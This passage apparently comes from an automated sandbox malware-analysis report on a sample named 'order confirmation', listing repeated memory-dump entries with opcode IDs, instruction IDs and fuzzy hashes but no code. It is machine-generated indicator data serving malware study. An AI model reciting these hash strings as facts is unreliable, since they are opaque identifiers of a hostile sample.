• Instruction ID: 1ec7b0c9c74e322dd0f88ce1f5a4bd4d78dec4b00badf4da9f77c4956ab97959
• Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
• Instruction Fuzzy Hash: 99418E36A00215DBDB22DE2E8454BBBBB71EB50758F95807FE944CB380D6339D40CB90
Memory Dump Source
• Opcode ID: 166fc1a60092a7976d8e731a975667cae00d7e95f7351ccd173e143c07470643
• Instruction ID: 5ac65ab517e7605606a2ef8ac99bfc2b3fb91078ab26af1d73b86c9ba8a4c566
• Opcode Fuzzy Hash: 166fc1a60092a7976d8e731a975667cae00d7e95f7351ccd173e143c07470643
• Instruction Fuzzy Hash: 2D417D71600605DFE725CF18C880B67BBF4FF54718F248A6AE5498B661E771E941CB90
Memory Dump Source
• Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
• Instruction ID: ce612874ed47ccc5cdbfa0832d6ee0d68ac1c25aece0684ded5b8edddf29b484
• Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
• Instruction Fuzzy Hash: 5F414B71A00719EFDB28CFA8C994AAABBF8FF18704B10496DE556D7690D370EA44CF50
Memory Dump Source
• Opcode ID: fb87fa0ad3d68683d4a44fcd5e56dfff1e33bfaa3954fd6e9a2b0cdfa48afe05
• Instruction ID: 8c1b245e0ed26ada7ef556fce328ca0f1b40ee682b027b69ddf795725a608cee
• Opcode Fuzzy Hash: fb87fa0ad3d68683d4a44fcd5e56dfff1e33bfaa3954fd6e9a2b0cdfa48afe05
                                                    • Instruction Fuzzy Hash: 7B41C570501705CFC722EF29C98179AB7B5FF54328F15826EC6169BAB2EB30A941CF51
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e79eda4cd96ee5f47bc19a82abcd7f3658a58ba9fb0bf68dfc58a5973ba30c3
                                                    • Instruction ID: 5c4a497a667fc2f35a5664992ba964137a86fdca4e1851a61f61b34605417e1c
                                                    • Opcode Fuzzy Hash: 3e79eda4cd96ee5f47bc19a82abcd7f3658a58ba9fb0bf68dfc58a5973ba30c3
                                                    • Instruction Fuzzy Hash: 91318DB1A01355DFDB12DF68D040799BBF0FB09728F2081AED119EB291D3369942CF90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 814f22e8578c69b2cb007e428b7ff358ac847f0f31c0373c0ff1590f6dbbb00e
                                                    • Instruction ID: 8e1184ff6aa432ae46639354b2dcdeafb088c12159a40353a3a7aac5ea03996d
                                                    • Opcode Fuzzy Hash: 814f22e8578c69b2cb007e428b7ff358ac847f0f31c0373c0ff1590f6dbbb00e
                                                    • Instruction Fuzzy Hash: 5E419F725043019FD720DF29C844B9BBBE8FF88664F004A2EF598D72A0D770D905CB92
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c39533236ed01f7c0cb168aba669d95881252f1caaa7cd5a619cd8495c118b2
                                                    • Instruction ID: a188d8e4583dfcb4714653f7f6ab92c2e8b3b9d2f35d9bbe0943167f344fdad2
                                                    • Opcode Fuzzy Hash: 5c39533236ed01f7c0cb168aba669d95881252f1caaa7cd5a619cd8495c118b2
                                                    • Instruction Fuzzy Hash: 5D4191726046429BD320DF6CD840A6BB7A9BFC8700F14462EF95997690E730E915C7A6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfdd111e5eef4b65142f8109dcb4e3eef42f3b1143dd7cd9c79efe5c778a7954
                                                    • Instruction ID: 4f3d8fd11934d5924a3d888911965c550bba78514181ddef747bc8757bdccd5c
                                                    • Opcode Fuzzy Hash: cfdd111e5eef4b65142f8109dcb4e3eef42f3b1143dd7cd9c79efe5c778a7954
                                                    • Instruction Fuzzy Hash: EC41F5302003069BDB25DF2CD8C4B6ABBE9FF80758F15442DE7468B6A2EB30D841CB95
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                    • Instruction ID: 4c0d2d8ab51ec870495d4a52ad77e5a8bc175d2da610622dbce3008cc6f39702
                                                    • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                    • Instruction Fuzzy Hash: CE311531A04284EBDB118B6CCC84BDBBFE8AF14754F0441AAF455D7352D774D844CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bba513d0135bbc56ff4e53c9d9d7420a1ca1bc4fa29a8c823a34f88b16b984ad
                                                    • Instruction ID: 4042f8f4300c9edb4008808c2f9fa86291823258ccd7aa01a940482426e47546
                                                    • Opcode Fuzzy Hash: bba513d0135bbc56ff4e53c9d9d7420a1ca1bc4fa29a8c823a34f88b16b984ad
                                                    • Instruction Fuzzy Hash: F031DC71740716ABDB229F698C41FAFBAA8AB59B54F000039FA04BB391DA74DD01C790
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a8dd73b0bf32b030368f35ab463d32a11dca94195d5bc4e9cb8a958e6de959c
                                                    • Instruction ID: 683ab266b356f573e8abcaea6ddf7e3a1e15958304e5dda955de57372f723b14
                                                    • Opcode Fuzzy Hash: 2a8dd73b0bf32b030368f35ab463d32a11dca94195d5bc4e9cb8a958e6de959c
                                                    • Instruction Fuzzy Hash: 7531B3322052018FC721DF1DD880E26BBE9FB80768F4F446EE9558B765DB30AC41DB92
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bd458167635d97cb393e9808a2c7b08de5307c74580c99d397b2cd06a53e96b
                                                    • Instruction ID: aac9193ddd4f4ca670b34a1fe8c10b58bd1113161d798bf006c81aa8e634e9cb
                                                    • Opcode Fuzzy Hash: 7bd458167635d97cb393e9808a2c7b08de5307c74580c99d397b2cd06a53e96b
                                                    • Instruction Fuzzy Hash: 4641BD71200B09DFD722CF28C880BD67BE8AB54318F15842EEA9A8B761D730E844CB54
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b023085cbacfa2ab1e4b0394f292bcd5c65d5dfb1343d28b7b150f82778c44ec
                                                    • Instruction ID: ee6dcebac9875aa40bfb15d6d15b77ac4778b35729c9a34e57d56ee8a96339be
                                                    • Opcode Fuzzy Hash: b023085cbacfa2ab1e4b0394f292bcd5c65d5dfb1343d28b7b150f82778c44ec
                                                    • Instruction Fuzzy Hash: 6B3192717042018FD720DF28C880A27BBE9FB84728F0A456EF9559B3A4D730EC05CB92
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47e3d378604bcff27649c689a259cbf2e815477e9221cc2f51c7265f9f69a3d3
                                                    • Instruction ID: 05af602a6317a2a449a05fa80f6f5e27e29d9303b026cbd15dc436698f8e5858
                                                    • Opcode Fuzzy Hash: 47e3d378604bcff27649c689a259cbf2e815477e9221cc2f51c7265f9f69a3d3
                                                    • Instruction Fuzzy Hash: 263108313056A29BF322979DC948B567FD8BB44B44F5D00A6EB45AB7F2DB78DC80C220
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8da30078468123cdf560a8743dc050c09aa25e981cf3baef64204c2539a7dc03
                                                    • Instruction ID: e0423f66c9242823732c7b8c01937d6ab1e76b4b06a096c34a3c36978d6198d6
                                                    • Opcode Fuzzy Hash: 8da30078468123cdf560a8743dc050c09aa25e981cf3baef64204c2539a7dc03
                                                    • Instruction Fuzzy Hash: 6731E475A00616ABEB15DF98CC40BEEB7B6FB44B44F464169E904EB254D770ED00CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47e19e6003049d3f178603af37d77926a7e826ea9c8114a87b037099219d6f39
                                                    • Instruction ID: 37f572e869818369d4e9e10206776847ab9a76f0364b8816d86493c223c20122
                                                    • Opcode Fuzzy Hash: 47e19e6003049d3f178603af37d77926a7e826ea9c8114a87b037099219d6f39
                                                    • Instruction Fuzzy Hash: 35316976A4012DABCF61DF58DC85BDE7BB5AB98350F1400E5E908A7261DA30DE91CF90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6798e3930090f8acc73cf706636bf4046e2ab43e07238c21c24f60bed82dec1
                                                    • Instruction ID: e7f5399f1b9ac150ffff4405e2276929f18979c332cfd1db38aa7cafeefbbb21
                                                    • Opcode Fuzzy Hash: f6798e3930090f8acc73cf706636bf4046e2ab43e07238c21c24f60bed82dec1
                                                    • Instruction Fuzzy Hash: 0231B772E04219AFDB21DFADCC40AAFBBB8EF44754F014436E516DB250D670AE018BA0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e03966873de51317aae75398429c0d3157a53757b3dd990f65d25adeb4e555f
                                                    • Instruction ID: 9e3170075c0b9cf5a19ad8a3146acc911b387f4d0a9332fe67b9c794d40e9385
                                                    • Opcode Fuzzy Hash: 0e03966873de51317aae75398429c0d3157a53757b3dd990f65d25adeb4e555f
                                                    • Instruction Fuzzy Hash: E831E471700A02EBEB229F6DD840AAFBBBAEB54754F06406EE505DB361DA70DC018B90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c2538a58510ec7e50772c22efaf032011fd95b025534a65a804f90f93429afe
                                                    • Instruction ID: 25ecad5ea7b89315524ee6d3e9cd4dcdd500ebd5d1dd67702a77372b01137ec7
                                                    • Opcode Fuzzy Hash: 4c2538a58510ec7e50772c22efaf032011fd95b025534a65a804f90f93429afe
                                                    • Instruction Fuzzy Hash: DE312432A04216DBC716DE6888C0AABBFB5EFD4258F014529FE15E7B20EB30DC0187E1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f38633e412598917eed8f7116907cccb78f426435f31d4a4c48be7742b7587c2
                                                    • Instruction ID: f121b43ffb83d7844401b47ee0964afcfffea26c3b8d87b0d2e9f4a8be6036f8
                                                    • Opcode Fuzzy Hash: f38633e412598917eed8f7116907cccb78f426435f31d4a4c48be7742b7587c2
                                                    • Instruction Fuzzy Hash: C2316DB16053018FE720CF19C840B5BBBE9EB98704F154A6EEA84D7765E7B0E944CB91
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                    • Instruction ID: cd01908a269374db6e794f9b575fc96911dcc8bba50e7ebd38b06cc1a99a725e
                                                    • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                    • Instruction Fuzzy Hash: FA312DB2B00B11AFD765CFADCD44B57BBF8BB08A54F04052DA59AC3790E670E900CB60
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c60d6f94826017bcca2be2d8cdc0a21800630aaad2e90329a4a9b079b079a9f5
                                                    • Instruction ID: 390a32cfb92616a11cdc1eb853084905dad693424e209b71f7844dc6303858f3
                                                    • Opcode Fuzzy Hash: c60d6f94826017bcca2be2d8cdc0a21800630aaad2e90329a4a9b079b079a9f5
                                                    • Instruction Fuzzy Hash: 0E319AB15053018FC712DF1AC54085AFBF1FF99618F4589AEE888AB322E731DE45CB92
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9de5be3463e86c2994d1bbc938289a3ef49795ddb47401bda7305b9d53a4380b
                                                    • Instruction ID: 4bc1f2c7254af6373c296f50ba42f3cb3f502cbbb44b7d787550c19c4924dc5d
                                                    • Opcode Fuzzy Hash: 9de5be3463e86c2994d1bbc938289a3ef49795ddb47401bda7305b9d53a4380b
                                                    • Instruction Fuzzy Hash: 4631E572B002059FDB20DFB8D981A6EBBF9EF94708F00852AD515E7A54D730ED81CB91
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                    • Instruction ID: bbce46f4500688e097b30617525a140a80b93f1753c4c640a036fe126ef93c4d
                                                    • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                    • Instruction Fuzzy Hash: 99212632E4025BAADB11DBBA8800BEFBBB9EF14744F1580369E15E7390E270C90187E0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee4ef613e177d791b5c6df4c79e7fd56d4b2dbd4c1dd245cf9cbd09607d48e00
                                                    • Instruction ID: e5c0682cddc2c17f4ff0c8c6471e9ad8f5e9800acf4f26a7aeefe8d7e9949588
                                                    • Opcode Fuzzy Hash: ee4ef613e177d791b5c6df4c79e7fd56d4b2dbd4c1dd245cf9cbd09607d48e00
                                                    • Instruction Fuzzy Hash: 9E312C719003018BD722AF9DCC41BBA7774EF51318F94817EDD499B392DE34998ACB90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction ID: 985c7a4c619d28932009536de9aec48e0557baa35e65617367d12050300d7d0e
                                                    • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction Fuzzy Hash: 58213036600652B6CF15EB998C40ABBBBB8EF50758F40802FFAD5876A1E634D950C361
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 98cf2b8d3c7ed155bd212e5154d0433a22f118b67e1cab665c331f18b7cab7fc
                                                    • Instruction ID: 36a6e2ab4c28393ebffa1183463bde254463ccfe049ab55ac3e585a089d0c540
                                                    • Opcode Fuzzy Hash: 98cf2b8d3c7ed155bd212e5154d0433a22f118b67e1cab665c331f18b7cab7fc
                                                    • Instruction Fuzzy Hash: 7C31C332A0152C9BDB31DF18DC81FEEB7BDEB15758F4101B5E645A7290E674AE808FA0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                    • Instruction ID: fd94151d5d2a29b8b9075fb867bf6ba447ff2278fbf49edadcd4c23d29d8d0d9
                                                    • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                    • Instruction Fuzzy Hash: AB11C6732056C6DBE722971CD544B663F95AB0078CF1900B1DE418BB62F339DC4BC250
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                    • Instruction ID: 8c1416ba6378908db7d5dfa954ec51ffdad4815d5100588e28804f552422f674
                                                    • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                    • Instruction Fuzzy Hash: EF01D232602105AFE7229F5DC841F9B7AA9EFD9B54F05802AEA05AB270E771DD41CB90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                    • Instruction ID: 5ce834fc687a841b557ae80fcd4a7c83043195a40c5debc836bce51ebdb19fa3
                                                    • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                    • Instruction Fuzzy Hash: D50149335047269BCB318F19D840A727BF8FF55B64740852DFD958B681C332D820CB60
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dffb11c3178d60765fe17c8b3786c6f187e5e8bfb9f0e502a08943c1fcf66a74
                                                    • Instruction ID: 8630a5a0a1c244a63bbc1f3043b4f700fba82b7cc8a7bb25d12f3b7525a2264c
                                                    • Opcode Fuzzy Hash: dffb11c3178d60765fe17c8b3786c6f187e5e8bfb9f0e502a08943c1fcf66a74
                                                    • Instruction Fuzzy Hash: 6A118B32241641EFDB15EF19CD80F56BBB8FF54B48F240069EA069B661C235ED01CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e10dfd7eedb423a4d7a7d52272b4998c2eb671cb64f33dadaa54e33c03c00ed
                                                    • Instruction ID: a54b752835416f37a10495b4ad96a3cac61c5438b2c0a746921130e816bf3acc
                                                    • Opcode Fuzzy Hash: 8e10dfd7eedb423a4d7a7d52272b4998c2eb671cb64f33dadaa54e33c03c00ed
                                                    • Instruction Fuzzy Hash: A4115E7054122DABEB25AF68CD42FE97274BF04714F5041D9A719AA1E1D6709E81CF84
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3dec23d32ad359fc31f792185c587ae461355fe732c4b58cc01011a88ae491e2
                                                    • Instruction ID: 7e1949b4d10b70e19d3b84a0e6adceca71c0cb9b6109ec10d21cc4df23bd9e9f
                                                    • Opcode Fuzzy Hash: 3dec23d32ad359fc31f792185c587ae461355fe732c4b58cc01011a88ae491e2
                                                    • Instruction Fuzzy Hash: 93111BB2900119BBCB15DB98CC85DDFBB7CEF58258F054166E506A7211EA34EA15CBE0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                    • Instruction ID: 928ba87456a1e3615b2072fd475a4c8e4bd8ee3c4a4b5d5b42c2ea06683ce1e0
                                                    • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                    • Instruction Fuzzy Hash: B20128322001018BDF229A5DD8C0BD3776BBFC8704F1642BAEE018F696EA71EC85C790
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9481dd13eb01ac3bc310d64caad36ef99f79c1bfb7ec7c531f35d914a704f70
                                                    • Instruction ID: 78ddb7178751d933d30d8c7fa698fcee8332b1780738f47b97fa30e91416d2f5
                                                    • Opcode Fuzzy Hash: f9481dd13eb01ac3bc310d64caad36ef99f79c1bfb7ec7c531f35d914a704f70
                                                    • Instruction Fuzzy Hash: 0511C8726441459FD711CF58D400BA6BBB5FB56314F09815AE848CF325D731EC41CBE0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c7143c430df6d8c1cadd3a4e745687d05ffbc79cc54d362fc08bfd5bf25a20a
                                                    • Instruction ID: 386092ea58e7c9c56ef0b2d726e1a79690e53dea428ca2dcf69fa1f6cedbefe4
                                                    • Opcode Fuzzy Hash: 6c7143c430df6d8c1cadd3a4e745687d05ffbc79cc54d362fc08bfd5bf25a20a
                                                    • Instruction Fuzzy Hash: EB11ECB1A002099BCB04DF9DD585AAEBBF4FF58250F10406AA905E7351D674EE01CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ff6cf95532ae4f8b8a053685e1ba7bed1370a8b231804834f64f4577b25774f
                                                    • Instruction ID: fa737253539e1b511d3eab6db0901cfafd43011aab3c6897294f1ee58eed6959
                                                    • Opcode Fuzzy Hash: 2ff6cf95532ae4f8b8a053685e1ba7bed1370a8b231804834f64f4577b25774f
                                                    • Instruction Fuzzy Hash: C901B5355401119FC732AE398440977FBA9FF61A54B45842FFA456B322CB30DD42CB91
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                    • Instruction ID: b9219fcea9fd629e41070a5bef63747355720ffcbfc683e88444df12b0f57711
